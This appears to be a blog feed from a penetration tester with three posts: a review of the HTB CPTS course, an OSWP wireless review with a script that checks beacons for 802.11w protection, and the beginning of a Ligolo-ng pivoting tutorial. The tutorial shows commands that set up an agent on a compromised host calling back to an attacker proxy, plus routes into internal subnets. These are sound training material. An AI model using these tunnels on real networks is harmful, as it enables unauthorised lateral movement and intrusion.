<p>Having spent a considerable amount of time immersed in web-related attacks in the <a target="_blank" href="https://4pfsec.com/oswe">AWAE labs</a> over the last 4 months, I began to feel a sense of detachment from the realm of Active Directory (AD) exploitation and pivoting. Now that I was done with the web attacks for the time being, I wanted to return to the Active Directory side of things and was looking for something to help hone my skills in this domain (haha...). That's when HTB's CPTS popped back onto my radar. I initially came across the CPTS roughly 9 months ago when it was first announced.</p>
<blockquote>
<p>HTB Certified Penetration Testing Specialist (HTB CPTS) is a highly hands-on certification that assesses the candidates’ penetration testing skills. HTB Certified Penetration Testing Specialist certification holders will possess technical competency in the ethical hacking and penetration testing domains at an intermediate level. They will be able to spot security issues and identify avenues of exploitation that may not be immediately apparent from searching for CVEs or known exploit PoCs.</p>
</blockquote>
<p>Having completed the course and cleared the exam, I felt compelled to share my experience and provide valuable insights for those who are interested in embarking on this journey or for those who are simply curious. As always I'll be splitting up the review into several parts.</p>
<hr />
<h1 id="heading-background">Background</h1>
<p>My experience with Active Directory (AD) has been a mix of exploration and hands-on learning. While my AD experience may not be extensive, I've built my own minimal <a target="_blank" href="https://ad.4pfsec.com/">AD environment</a> in my <a target="_blank" href="https://homelab.4pfsec.com/">home lab</a> which allowed me to gain practical experience in setting up and configuring AD components, as well as understanding the intricacies of user management, group policies, and authentication mechanisms.</p>
<p>The greater chunk of my AD exploitation knowledge comes from the <a target="_blank" href="https://4pfsec.com/zero-point-securitys-certified-red-team-operator-crto-review">CRTO (Certified Red Team Operator)</a> course, which I enrolled in last year and which gave me a deep understanding of the various AD attack vectors. From reconnaissance and privilege escalation to lateral movement and persistence techniques, the CRTO course materials gave me a solid foundation in AD exploitation. Even though the iteration of OSCP I took did cover AD, I wasn't evaluated on it in my exam.</p>
<p>On top of these, I passively engaged in various challenge labs that focused on AD from time to time. These helped with the labs and challenges throughout CPTS.</p>
<hr />
<h1 id="heading-the-course">The Course</h1>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1686558198011/0f9d8c8e-c6d4-4a6f-af8d-786a2cc4f803.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-penetration-tester-path">Penetration Tester Path</h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1686557656732/5efe4675-2dd1-4f49-9d6c-26e82fdcdf90.png" alt class="image--center mx-auto" /></p>
<p>The Penetration Tester job role path is what you have to go through before being eligible to take the exam. This is the course that accompanies the exam. The course is extremely well put together and consists of the following domains:</p>
<ul>
<li><p>Web attacks</p>
</li>
<li><p>Local Privilege Escalation (Windows &amp; Linux)</p>
</li>
<li><p>Post-exploitation</p>
</li>
<li><p>Basic C2 (Metasploit Framework)</p>
</li>
<li><p>Active Directory Enumeration &amp; Attacks</p>
</li>
<li><p>Pivoting &amp; Lateral Movement</p>
</li>
<li><p>Penetration testing processes</p>
</li>
<li><p>Vulnerability Assessment &amp; Reporting</p>
</li>
</ul>
<h2 id="heading-the-good">👍The Good</h2>
<p>The course content was of high quality and was accompanied by individual labs that apply the concepts taught in the module.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1686558969830/e48f986d-07c8-4823-b2d5-114cb93f3204.png" alt class="image--center mx-auto" /></p>
<p>This is a snippet of some of the modules in the <code>ACTIVE DIRECTORY ENUMERATION &amp; ATTACKS</code> section. Modules with the cube icon imply that they contain interactive labs to practice the theory taught.</p>
<p>There are roughly 500 exercises and tasks that you'll go through while working through the Penetration Tester path. The course covers quite a number of domains and it does so well. Fundamentals are well explained and easy to understand. Even with my prior experience, I learned a couple of interesting techniques from the modules.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1686560551474/e359477e-3601-41d6-b3e5-2bc74a405814.png" alt class="image--center mx-auto" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1686560625879/8db29043-9772-4a68-b93b-34bc72f665f2.png" alt class="image--center mx-auto" /></p>
<p>At the end of most modules, there's a <code>Skills Assessment</code> section, which usually consists of a multi-part exercise or several exercises of varying difficulty. Unlike the other chapters, the Skills Assessment does not come with a guided walkthrough or theory write-up. It draws on all the attack vectors taught in the entire module and is a good gauge of where you stand and whether you can solve challenges without some form of hand-holding.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1686560969151/642d5224-e796-46b2-ac37-10cad6d05df7.png" alt class="image--center mx-auto" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1686561286834/726657c9-08ef-45c1-a5a5-d7400bd98729.png" alt class="image--center mx-auto" /></p>
<p>At the end of the course, you'll face this module called <code>ATTACKING ENTERPRISE NETWORKS</code>. This module covers all aspects of a penetration test from start to finish. You'll work through a simulated External Penetration Test resulting in internal network access and ultimate compromise of the Active Directory environment. Most importantly, this module walks through each and every step toward Domain Dominance. It's highly advised to go through this network without the walkthrough. It helps give an estimate of how ready you are for the examination.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1686561702841/23bc3b0a-c9ca-480d-93e4-bde650c2a646.png" alt class="image--center mx-auto" /></p>
<p>This network is also what I based the <a target="_blank" href="https://4pfsec.com/ligolo">Ligolo-ng write-up</a> on. It's a well-put-together lab that consists of web attacks, Active Directory exploitation, pivoting through multiple subnetworks and more. I personally enjoyed this end-of-course exercise. After going through it blind, I'd definitely recommend going through it a second time with the walkthrough. The walkthrough covers steps that should be performed on an engagement even when they don't yield useful results, such as password spraying, LLMNR spoofing and Kerberoasting every possible account. And as always, taking good notes throughout the practice engagement definitely helps in the exam! That said, being able to do this blind doesn't necessarily mean you're ready for the exam. Mileage varies based on experience!</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1686567520085/b1d97f5b-a309-4cb1-b1d8-d61be9c6a155.png" alt class="image--center mx-auto" /></p>
<p>One of the best things about the platform was the <code>Global Search</code>. It lets students search for anything site-wide, which is super useful when it comes to finding a particular technique.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1686772507689/489256b9-1106-4f0f-ab52-55b580b8a1ff.png" alt class="image--center mx-auto" /></p>
<p>The HTB CPTS certification course not only offers immense value but is also priced exceptionally well. Each dollar spent on this course is truly worth it, considering the high quality and comprehensive content it provides. The attention to detail and the expertise of the instructors shine through every module.</p>
<p>You could pay the $490 to get access to all <code>Tier II</code> modules and an exam voucher (which comes with a free retake) or....</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1686772836180/4e844e60-200b-45b3-9d75-9228715b4578.png" alt class="image--center mx-auto" /></p>
<p>if you have access to a personal <code>.edu</code> mailbox, you could pay $8 a month for the same level of access and purchase the exam voucher separately for $210.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1686772900001/46fbb6f4-3d18-4ac5-816b-d0fc93eb20e5.png" alt class="image--center mx-auto" /></p>
<p>*All prices are in USD*</p>
<h2 id="heading-the-bad">👎The Bad</h2>
<p>My iteration of this section will probably be different from yours but hey here are things that I found to be iffy for me.</p>
<h3 id="heading-the-text">The Text</h3>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1686562907004/b6c0b2fd-c53d-452d-816a-5f50e7d7369f.png" alt class="image--center mx-auto" /></p>
<p>The course was a bit too wordy for me, and I'm sure this is probably a <code>me</code> problem. I'm more of a visual learner and I prefer video walkthroughs where I can see things in action.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1686563318517/00903436-88e3-4035-a2cd-af434a67f748.png" alt class="image--center mx-auto" /></p>
<p>However, the course did have extensive screenshots and code snippets to make up for that. I'd still have preferred videos. Each to their own I guess.</p>
<h3 id="heading-forced-100-course-completion">Forced 100% Course Completion</h3>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1686563528285/294c08b9-f5cc-4309-92e6-8ddb50d2dd69.png" alt class="image--center mx-auto" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1686569012672/b9fe6135-0d5b-4122-9f0f-19ee71fa74fb.png" alt class="image--center mx-auto" /></p>
<p>The other issue I had with the course was that students were forced to complete all tasks and challenge labs that come with the <code>Penetration Tester</code> job-role path before they could start the examination process.</p>
<p>This puts students with prior experience at a slight disadvantage. Experienced students would have to sit through sections that they are already well versed in and painstakingly complete the corresponding challenge labs.</p>
<p>I get why they're doing this but there should be some sort of opt-out program that helps seasoned students.</p>
<hr />
<h1 id="heading-the-exam">The Exam</h1>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1686564125580/86179397-048c-4e41-a82f-fdd6e425fcb1.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-about">About</h2>
<blockquote>
<p>The candidate will have to perform blackbox web, external and internal penetration testing activities against a real-world Active Directory network hosted in HTB’s infrastructure and accessible via VPN (using Pwnbox or their own local VM). Upon starting the examination process, a letter of engagement will be provided that will clearly state all engagement details, requirements, objectives, and scope. All a candidate needs to perform the required penetration testing activities is a stable internet connection and VPN software. HTB Certified Penetration Testing Specialist is the most up-to-date and applicable certification for Penetration Testers that focuses on both penetration testing and professionally communicating findings.</p>
</blockquote>
<p>Candidates are given 10 days to complete the exam and the corresponding report. The exam consists of multiple networks (External &amp; Internal). It covers most if not all domains taught in the course.</p>
<p>There are a total of <strong>14 flags</strong> spread across multiple machines on the network which add up to <strong>100 points</strong>. Candidates require at least <strong>12 flags (85 points)</strong> with a <strong>comprehensive report</strong> to pass the examination. The general flow of the exam is very similar to the <code>ATTACKING ENTERPRISE NETWORKS</code> module but the complexity varies heavily.</p>
<h2 id="heading-my-experience">My Experience</h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1686567469718/f968e19a-f68b-4b92-bd8e-94114bcccc85.png" alt class="image--center mx-auto" /></p>
<p>I cleared the exam with all 14 flags and 100 points. I personally used up all the time given for both the report and the actual exploitation.</p>
<p>The first couple of hours were pretty draining: extensive enumeration of every exposed service and a lot of note-taking. I was also mentally coming up with different paths that could be viable, including some questionable ones (🤔).</p>
<p>After a couple more hours of enumeration, I had the ball rolling....or at least I thought so. There'd be one major move followed by a couple of minor steps that were simpler than the bigger hurdle.</p>
<p>Here's something a friend of mine said to me while I was stuck at one of the lateral move steps:</p>
<blockquote>
<p>If you're stuck for too long on a single target, it means that you are stuck on a single way of thinking.</p>
</blockquote>
<p>It's cliché, but taking a break during those long sessions really does help. The exam lab is extremely well made and I found it to be pretty diverse in terms of attack vectors. It's right up there with the other exam labs I've crunched through.</p>
<p>Overall, the exam is definitely challenging &amp; draining but pushes the candidate to apply everything that was taught during the course. I don't think there was knowledge from any chapter that wasn't applied in the exam. The exam also teaches students time management and the importance of reporting.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1686771463587/e5b448c8-cb9f-458b-968e-05fb041aa38c.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-reporting">Reporting</h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1686567427774/30af6fae-e6ed-4b36-be51-e134284a9f55.png" alt class="image--center mx-auto" /></p>
<p>Reporting was a big thing throughout the exam. I've always been used to taking raw notes and reporting all at once at the end of the exam. I found that to be a bit exhausting this time around given that it was a comprehensive engagement. I plan to report as I go from now on. We'll see how that goes.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1686568076578/b3a362c2-d10c-4d75-914b-639484d9f19c.png" alt class="image--center mx-auto" /></p>
<p>HTB provides students with a report template and strongly advises them to use it, as it essentially tells students what the graders are looking for and makes grading easier for HTB.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1686568179048/e451c61b-d8ad-46d1-8594-7eba24bfbbb9.png" alt class="image--center mx-auto" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1686568210252/02d5cba8-130b-4289-a141-c5d091f658d5.png" alt class="image--center mx-auto" /></p>
<p>Here are a few snippets of the report template given to the students at the start of the examination. The report requires students to provide a full walkthrough of the engagement. Showcasing how the pentester went from having no access to gaining Root access / Domain Dominance.</p>
<hr />
<h1 id="heading-conclusion">Conclusion</h1>
<p>In conclusion, the HTB CPTS certification has proven to be a valuable and transformative learning experience for me. This course has provided me with the opportunity to delve into the world of AD exploitation and address the areas where I felt a lack of knowledge. However, the course does cover more than just AD as mentioned in this writeup. The comprehensive curriculum and hands-on approach have allowed me to bridge some of the gaps in my understanding.</p>
<p>In summary, I recommend the HTB CPTS certification to individuals eager to deepen their understanding of offensive security (&amp; AD Exploitation for that matter). This course provides a comprehensive and practical foundation for addressing various security challenges and honing penetration testing skills.</p>
<p>With that out of the way, on to the next! 😁</p>
<hr />
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1686771948804/7846ed60-95ea-4f17-92ba-bbd8aa88bf83.png" alt class="image--center mx-auto" /></p>
<p>- Nee</p>
<hr />
]]></content:encoded></item><item><title><![CDATA[OSWP - Foundational Wireless Network Attacks - Review (2023)]]></title><description><![CDATA[Introduction
Greetings, fellow cyber peoplez! Just wanted to give you guys some insight into my journey towards earning the Offensive Security Wireless Professional (OSWP) certification. In this blog post, I will take you through some of my experienc...]]></description><link>https://4pfsec.com/oswp</link><guid isPermaLink="true">https://4pfsec.com/oswp</guid><category><![CDATA[wireless network]]></category><category><![CDATA[information security]]></category><category><![CDATA[Certification]]></category><category><![CDATA[offsec]]></category><dc:creator><![CDATA[Nee]]></dc:creator><pubDate>Sun, 21 May 2023 19:41:16 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1684697986595/af8aeec0-57ab-48df-bfb1-9129771f77a7.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h1 id="heading-introduction">Introduction</h1>
<p>Greetings, fellow cyber peoplez! Just wanted to give you guys some insight into my journey towards earning the Offensive Security Wireless Professional (OSWP) certification. In this blog post, I will take you through some of my experiences throughout this certification and how I tackled some of the issues I faced.</p>
<p>The PEN-210 (OSWP) is considered a foundational course alongside the PEN-200 (OSCP). Compared to the challenging PEN-200 certification (💀), the OSWP can be seen as a more approachable step in the journey towards wireless network security. In other words, it's not as tough!</p>
<hr />
<h1 id="heading-background">Background</h1>
<p>I've had little to no (practical) experience pentesting wireless networks before this. However, I was familiar with the aircrack-ng suite and the cracking tools that can be used alongside it. I had a <a target="_blank" href="https://4pfsec.com/wireless-hacking-with-the-wifi-pineapple">wifi pineapple</a> for a little while and was experimenting with it a couple of months ago.</p>
<p>Thus, I was looking forward to getting more hands-on experience with this course. I'm proficient in setting up wired networks but that proficiency didn't carry over to the wireless side of things while setting up the labs.</p>
<hr />
<h1 id="heading-gear">Gear</h1>
<h2 id="heading-router">Router</h2>
<ul>
<li><p>NETGEAR AC1000 (R6080)</p>
</li>
<li><p>Linksys WiFi 5 Router Dual-Band AC1200 (E5400)</p>
</li>
</ul>
<p>Offsec recommends the routers mentioned above to all students taking the course. However, they're pretty old (as expected) and the availability of the router depends heavily on where you're based out of. Fret not, there were some alternatives that saved me.</p>
<h3 id="heading-dd-wrt">DD-WRT</h3>
<blockquote>
<p>DD-WRT is a Linux based alternative OpenSource firmware suitable for a great variety of WLAN routers and embedded systems. The main emphasis lies on providing the easiest possible handling while at the same time supporting a great number of functionalities within the framework of the respective hardware platform used.</p>
</blockquote>
<p>After some intense g00gling, I came across DD-WRT, a third-party Linux-based router firmware along the lines of OpenWrt. I had this extremely old D-Link <code>dir-868L</code> sitting around collecting dust in my rack.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684695865009/dc98276f-e0be-4d3c-87c6-69399ca3c816.png" alt class="image--center mx-auto" /></p>
<p>Luckily enough dd-wrt had custom firmware for it and I was able to flash it with no issues. If you were going to purchase the recommended router, I'd recommend looking into dd-wrt to check for your old router's compatibility before wasting some cash.</p>
<h2 id="heading-wireless-adapter">Wireless Adapter</h2>
<ul>
<li><p>Alfa AWUS036NHA</p>
</li>
<li><p>For wireless card compatibility, please refer to the <a target="_blank" href="https://www.aircrack-ng.org/doku.php?id=compatibility_drivers">Aircrack-ng wiki</a></p>
</li>
</ul>
<p>For the wireless adapter, Offsec recommends that students get the Alfa adapter mentioned above or refer to the Aircrack-ng wiki and pick one of their liking.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684696504906/e5632c67-10af-4e8f-925b-3062c8fc971e.png" alt class="image--center mx-auto" /></p>
<p>However, I ended up getting an Alfa <code>AC1900</code>, which was slightly overkill. After the card arrived, I realized that Kali did not support the adapter out of the box. Thankfully the fix was as simple as installing the following package.</p>
<pre><code class="lang-plaintext"># Realtek RTL8814AU driver used by the Alfa AC1900; a DKMS module, so it is rebuilt for each new kernel
sudo apt install realtek-rtl8814au-dkms
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684696202086/de8314bf-f9a5-4104-8404-fca5dafcc3e3.png" alt class="image--center mx-auto" /></p>
<p>Shoutout to this kind soul over in the Amazon reviews section😂.</p>
<hr />
<h1 id="heading-labs">Labs</h1>
<p>With the gear out of the way, let's discuss labs. To make things somewhat difficult, the course did not come with any labs. This would explain why offsec had to recommend routers. Students were required to set up most if not all the labs by themselves. However, there were a ton of guides on how to set up the following networks for attacking. (WEP, WPA[1/2/enterprise], WPS).</p>
<p>Setting up the various networks with dd-wrt wasn't too complicated. The process was pretty much the following:</p>
<ul>
<li><p>Find a guide</p>
</li>
<li><p>Find the corresponding setting on my dd-wrt GUI</p>
</li>
<li><p>Wait for the network to go up</p>
</li>
</ul>
<p>The "annoying" part was actually keeping a client connected to the network so that there was something to deauthenticate and a handshake to capture. I ended up using another VM with a Wi-Fi adapter passed through as the victim client.</p>
<p>Also verify that your router does not have <code>802.11w</code> (Protected Management Frames) enabled: with PMF on, associated clients discard spoofed deauthentication frames, so you can't force a reconnect and capturing the handshake becomes much harder.</p>
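<p>Before spending an evening on deauths that never land, it is worth checking this from a capture. The following is an added example written for this post (my code, not PEN-210 courseware or an aircrack-ng tool): it decodes the RSN information element from a beacon's tagged parameters and reports whether the access point advertises PMF as required, optional or disabled, by reading the MFPR and MFPC bits of the RSN Capabilities field. The beacon blobs it runs against are constructed inline; with a real capture you would pass it the tagged-parameter bytes that follow the fixed 12-byte beacon header.</p>

```python
"""Tell whether an AP advertises 802.11w Protected Management Frames (PMF).

Added example for this write-up, not PEN-210 courseware or an aircrack-ng tool.
Input is the tagged-parameters blob of a beacon or probe response (the bytes
after the fixed 12-byte header of the frame body). The sample blobs below are
constructed by hand so the script runs offline.
"""
import struct
from typing import Dict, Iterator, Optional, Tuple

RSN_IE_ID = 48       # element ID of the RSN information element
MFPR_BIT = 1 << 6    # RSN capabilities: Management Frame Protection Required
MFPC_BIT = 1 << 7    # RSN capabilities: Management Frame Protection Capable


def iter_ies(blob: bytes) -> Iterator[Tuple[int, bytes]]:
    """Yield (element_id, payload) for each TLV in a tagged-parameters blob."""
    off = 0
    while off + 2 <= len(blob):
        eid, length = blob[off], blob[off + 1]
        body = blob[off + 2:off + 2 + length]
        if len(body) < length:   # truncated capture: stop instead of guessing
            return
        yield eid, body
        off += 2 + length


def rsn_capabilities(rsn: bytes) -> Optional[int]:
    """Return the RSN Capabilities field, or None if the IE stops before it.

    Layout: version(2) | group cipher(4) | pairwise count(2) | pairwise(4*n)
    | AKM count(2) | AKM(4*m) | capabilities(2) | ...  Everything after the
    version is optional, so each step is bounds-checked.
    """
    off = 2                                   # version
    if len(rsn) < off + 4:
        return None
    off += 4                                  # group data cipher suite
    if len(rsn) < off + 2:
        return None
    (n_pairwise,) = struct.unpack_from("<H", rsn, off)
    off += 2 + 4 * n_pairwise
    if len(rsn) < off + 2:
        return None
    (n_akm,) = struct.unpack_from("<H", rsn, off)
    off += 2 + 4 * n_akm
    if len(rsn) < off + 2:
        return None
    return struct.unpack_from("<H", rsn, off)[0]


def pmf_mode(tagged_params: bytes) -> str:
    """'required', 'optional' or 'disabled' according to the MFPR/MFPC bits.

    required -> stations drop unprotected deauth/disassoc; deauth attacks fail
    optional -> clients that negotiated PMF ignore spoofed deauths, legacy
                clients still honour them
    disabled -> no RSN IE, or MFPC clear: a classic deauth works
    """
    for eid, body in iter_ies(tagged_params):
        if eid != RSN_IE_ID:
            continue
        caps = rsn_capabilities(body)
        if caps is None:
            return "disabled"
        if caps & MFPR_BIT:
            return "required"
        return "optional" if caps & MFPC_BIT else "disabled"
    return "disabled"


# --- constructed sample beacons (not real captures) -------------------------
def build_ssid_ie(ssid: str) -> bytes:
    raw = ssid.encode()
    return bytes([0, len(raw)]) + raw


def build_rsn_ie(caps: int, akm: bytes = b"\x00\x0f\xac\x02") -> bytes:
    """WPA2 RSN IE with CCMP-128 ciphers and one AKM (PSK unless overridden)."""
    body = (b"\x01\x00"                          # RSN version 1
            + b"\x00\x0f\xac\x04"                # group cipher: CCMP-128
            + b"\x01\x00" + b"\x00\x0f\xac\x04"  # 1 pairwise cipher: CCMP-128
            + b"\x01\x00" + akm                  # 1 AKM suite
            + struct.pack("<H", caps))           # RSN capabilities
    return bytes([RSN_IE_ID, len(body)]) + body


SAMPLE_APS: Dict[str, bytes] = {
    "lab-pmf-required": build_ssid_ie("lab-pmf-required") + build_rsn_ie(MFPC_BIT | MFPR_BIT),
    "lab-pmf-optional": build_ssid_ie("lab-pmf-optional") + build_rsn_ie(MFPC_BIT),
    "lab-legacy-wpa2": build_ssid_ie("lab-legacy-wpa2") + build_rsn_ie(0),
    "lab-open": build_ssid_ie("lab-open"),                 # no RSN IE at all
}


def audit(aps: Dict[str, bytes]) -> Dict[str, str]:
    """Map each AP name to its PMF posture."""
    return {name: pmf_mode(ies) for name, ies in aps.items()}


if __name__ == "__main__":
    for name, mode in audit(SAMPLE_APS).items():
        print(f"{name:18s} PMF {mode}")
```

<p>An AP that reports <code>required</code> will have every associated station discard unprotected deauthentication frames, so the fix is on the router side: turn 802.11w off (or set it to optional and use a victim client that does not negotiate PMF) before trying to capture the handshake.</p>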
<hr />
<h1 id="heading-the-exam">The Exam</h1>
<h2 id="heading-my-experience">My Experience</h2>
<p>The exam was pretty straightforward. I was presented with 3 different types of networks to attack and had to successfully compromise 2 out of the 3 networks to pass. However, there was a guideline that stated that cracking 1 of the networks was mandatory to pass. This basically meant that you could only "choose" one other network to compromise.</p>
<p>My exam environment was pretty stable (for the most part). When I was sniffing on one of the networks, I was only getting stations. Thankfully that issue was solved with a simple revert.</p>
<p>Word of advice, don't limit yourself to the tools within the coursebook. There might be another tool out there that might get things done with a little bit more ease even though the end product is the same.</p>
<h2 id="heading-thoughts">Thoughts</h2>
<p>Overall, the exam was pretty doable as long as you went through the courseware and familiarised yourself with the commands and processes! Reporting was as simple as other offsec examinations. Modify the <a target="_blank" href="https://www.offsec.com/wifu/OSWP-Exam-Report.docx">given template</a> to your liking and submit!</p>
<hr />
<h1 id="heading-conclusion">Conclusion</h1>
<p>I enjoyed the PEN-210 and understood some fundamental content and debunked a few misconceptions of mine. Was definitely less stressful compared to the other offsec courses I underwent. Hope this helps someone out there, all the best for your attempt!</p>
<hr />
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684698147669/794998d6-b8d8-4617-b403-fc8428ee64a5.png" alt class="image--center mx-auto" /></p>
]]></content:encoded></item><item><title><![CDATA[Ligolo-ng: Tunneling like a VPN]]></title><description><![CDATA[Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).

https://github.com/nicocha30/ligolo-ng
 
Background
Pivoting is a techn...]]></description><link>https://4pfsec.com/ligolo</link><guid isPermaLink="true">https://4pfsec.com/ligolo</guid><category><![CDATA[Active Directory]]></category><category><![CDATA[networking]]></category><category><![CDATA[pivoting]]></category><dc:creator><![CDATA[Nee]]></dc:creator><pubDate>Mon, 15 May 2023 21:38:45 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1684186703302/af2050fc-a972-4acb-8351-6cc1680a7917.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong>Ligolo-ng</strong> is a <em>simple</em>, <em>lightweight</em> and <em>fast</em> tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a <strong>tun interface</strong> (without the need of SOCKS).</p>
</blockquote>
<div class="embed-wrapper"><div class="embed-loading"><div class="loadingRow"></div><div class="loadingRow"></div></div><a class="embed-card" href="https://github.com/nicocha30/ligolo-ng">https://github.com/nicocha30/ligolo-ng</a></div>
<h1 id="heading-background">Background</h1>
<p>Pivoting is a technique used by attackers to move from one compromised system to another. This can be a valuable tool for attackers, as it allows them to expand their reach and access more sensitive data.</p>
<p>By pivoting, pentesters can gain access to systems that would otherwise be unreachable. I've been working through a couple of labs recently and it has made me realize how painstaking manual pivoting is.</p>
<p>I have used a variety of tools for pivoting, including chisel, sshuttle, SSH reverse port forwarding paired with proxychains, <s>ngrok</s> and plink. However, I have found these tools cumbersome and difficult to use when there are multiple networks stacked on top of each other. During my lab time with <a target="_blank" href="https://4pfsec.com/zero-point-securitys-certified-red-team-operator-crto-review">Cobalt Strike</a>, I realized how easy pivoting with a C2 framework was.</p>
<p>Recently, I discovered a tool called <strong>Ligolo-ng</strong>, written by <a target="_blank" href="https://twitter.com/Nicocha30">Nicolas Chatelain</a>, that I found much more user-friendly and effective at what it does. Once I'd used it, Ligolo felt like a C2 framework dedicated to pivoting &amp; proxying. I'll be covering the setup, usage and practicality of this tool in this post!</p>
<hr />
<h1 id="heading-video-demo">Video Demo</h1>
<p>Here's a video demo showcasing the tool's capability! This'll help you decide if you should continue reading.</p>
<div class="embed-wrapper"><div class="embed-loading"><div class="loadingRow"></div><div class="loadingRow"></div></div><a class="embed-card" href="https://youtu.be/ucMhBpvZTWY">https://youtu.be/ucMhBpvZTWY</a></div>
<hr />
<h1 id="heading-network">Network</h1>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684184907945/d25e5774-8119-4878-8d5d-75d2f6c47e29.png" alt class="image--center mx-auto" /></p>
<pre><code class="lang-plaintext">NETWORK A - 10.129.203.0/24
NETWORK B - 172.16.8.0/24
NETWORK C - 172.16.9.0/24

DMZ01 - Connected to both Network A &amp; B
DC01  - Connected to both Network B &amp; C
</code></pre>
<p>This is the network we'll be pivoting through to test the tool. Our first pivot will be on <code>DMZ01</code>, giving us access to Network B, and the subsequent double pivot will be on <code>DC01</code>, giving us access to Network C.</p>
<hr />
<h1 id="heading-prerequisites">Prerequisites</h1>
<p>Pick your poison and meet me over at the next section!</p>
<h2 id="heading-compiling-binaries">Compiling Binaries</h2>
<pre><code class="lang-plaintext">$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
# Build for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go
$ GOOS=windows go build -o proxy.exe cmd/proxy/main.go
</code></pre>
<h2 id="heading-precompiled-binaries">Precompiled binaries</h2>
<p><a href="https://github.com/nicocha30/ligolo-ng/releases">https://github.com/nicocha30/ligolo-ng/releases</a></p>
<h3 id="heading-terminologies">Terminologies</h3>
<pre><code class="lang-plaintext">PROXY SERVER = C2 / Kali Box
AGENT = pwned host / victim box
</code></pre>
<hr />
<h1 id="heading-setting-up-the-proxy-server">Setting up the Proxy Server</h1>
<p>This section covers setting up the Proxy Server on the Kali box.</p>
<h2 id="heading-creating-a-tun-interface">Creating a TUN Interface</h2>
<pre><code class="lang-plaintext">sudo ip tuntap add user nee mode tun ligolo
sudo ip link set ligolo up
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684182783410/0bf76f55-e627-4463-a3a2-389a4a12ccc4.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-verifying-interface">Verifying Interface</h3>
<pre><code class="lang-plaintext">ip a
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684182845324/f8b5b9ec-5e0a-420f-aba9-54329fc759a6.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-starting-the-proxy-server">Starting the Proxy Server</h2>
<pre><code class="lang-plaintext">./proxy -selfcert
</code></pre>
<p>Running <code>./proxy -autocert</code> will generate legitimate certificates using Let's Encrypt.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684182956010/64ae4cf1-f82d-4b3c-a46b-6809eed4b374.png" alt class="image--center mx-auto" /></p>
<hr />
<h1 id="heading-setting-up-the-agent">Setting up the Agent</h1>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684185697573/33a129bc-504e-433c-b5e0-e0a603200ea9.png" alt class="image--center mx-auto" /></p>
<pre><code class="lang-plaintext">RED - Hosts reachable
BLUE - Established Pivot Tunnel
</code></pre>
<p>Once we've set up the agent on DMZ01, we'll have a foothold in 2 networks and be able to access every host on Network B through the pivot on DMZ01.</p>
<p><strong>DMZ01</strong></p>
<p>We can see that the DMZ01 host has 2 network adapters. However, from our Kali box we are only able to reach the <code>10.129.203.0/16</code> network before the pivot.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684182998224/c74c28ea-588f-4c91-8079-d92b88c34c8f.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-connecting-to-proxy-server">Connecting to Proxy Server</h2>
<pre><code class="lang-plaintext">./agent -connect 10.10.15.146:11601 -ignore-cert
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1684183025541/41258028-02ec-472d-8f95-be5cc82dab15.png" alt class="image--center mx-auto" /></p>
<p>Now that we're successfully connected, we can head back to the Kali box and add an <code>ip route</code> for the pivot network. This tells the Kali box which interface to use when accessing the networks behind the pivot.</p>
<h3 id="heading-adding-a-new-route-on-proxy-server">Adding a new route on Proxy Server</h3>
<pre><code class="lang-plaintext">sudo ip route add 172.16.8.0/24 dev ligolo
</code></pre>
